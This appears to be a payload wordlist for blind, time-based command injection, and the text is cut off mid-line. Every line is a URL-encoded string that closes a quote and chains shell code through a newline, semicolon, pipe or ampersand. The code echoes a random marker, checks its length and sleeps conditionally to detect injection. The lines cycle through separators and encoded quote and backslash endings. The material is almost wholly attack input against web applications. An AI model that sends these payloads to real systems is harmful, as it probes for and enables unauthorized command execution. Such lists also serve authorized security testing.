n%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%27%7C%20%5B%201%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%27%7C%20%5B%202%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%27%7C%20%5B%203%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%27%7C%20%5B%204%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%27%7C%20%5B%205%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%27%7C%20%5B%206%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%27%7C%20%5B%207%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%27%7C%20%5B%208%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%27%7C%20%5B%209%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%27%7C%20%5B%201%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%27%7C%20%5B%202%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%27%7C%20%5B%203%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%27%7C%20%5B%204%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%27%7C%20%5B%205%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%27%7C%20%5B%206%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%27%7C%20%5B%207%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%27%7C%20%5B%208%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%27%7C%20%5B%209%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%27%7C%20%5B%201%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%27%7C%20%5B%202%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%27%7C%20%5B%203%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%27%7C%20%5B%204%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%27%7C%20%5B%205%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%27%7C%20%5B%206%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%27%7C%20%5B%207%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%27%7C%20%5B%208%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%27%7C%20%5B%209%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%27%7C%20%5B%201%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%27%7C%20%5B%202%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%27%7C%20%5B%203%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%27%7C%20%5B%204%20-ne%20%24%28echo%20X